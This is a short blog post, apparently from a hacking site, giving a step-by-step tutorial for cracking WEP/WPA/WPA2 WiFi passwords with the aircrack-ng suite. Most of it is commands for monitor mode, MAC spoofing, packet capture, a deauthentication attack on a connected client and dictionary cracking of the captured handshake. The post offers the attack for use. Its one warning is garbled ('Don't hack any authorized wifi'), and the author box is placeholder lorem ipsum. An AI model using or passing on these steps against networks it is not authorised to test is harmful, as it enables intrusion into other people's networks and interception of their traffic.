Friday, 18 April 2014

Unknown

How to Crack WIFI Passwords (WEP/WPA/WPA2) using Backtrack and Fern Wifi Cracker

Warning:::::::Don't hack any  authorized wifi otherwise you go to jail.

Hack Wifi

 Tools

  • Compatible Wifi Card (Optional) 

Rules to follow 

1.Now you First install a Vmware   in your system.
2. Then you create a virtual machine in your Vmware.



3.Then power on your machine. 
4.And  Now your all set to go...just simply follow below steps...now




Steps to Follow 

    •  airmon-ng

    The result will be something like :


    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]
     

    • airmon-ng start wlan0 

    •  (Optional) Change the mac address of the mon0 interface.

    • ifconfig mon0 down

      macchanger -m 00:11:22:33:44:55 mon0
      ifconfig mon0 up

       

    • airodump-ng mon0

      Then, press "
      Ctrl+c" to break the program.
    •  airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID
    This terminal is keeping running.open another terminal.


    • aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

      *where -a is the BSSID
                 -c is the client MAC address (STATION)
       Wait for the handshake 
      Use the John the Ripper as word list to crack the WPA/WP2 password                              aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
    • You can  use your own password wordlist.  or You can download predefined Dictionaries from net.
    •  
    • Keep visiting our Blog at https://www.myhackarena.blogspot.in

       

Unknown

About Unknown -

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :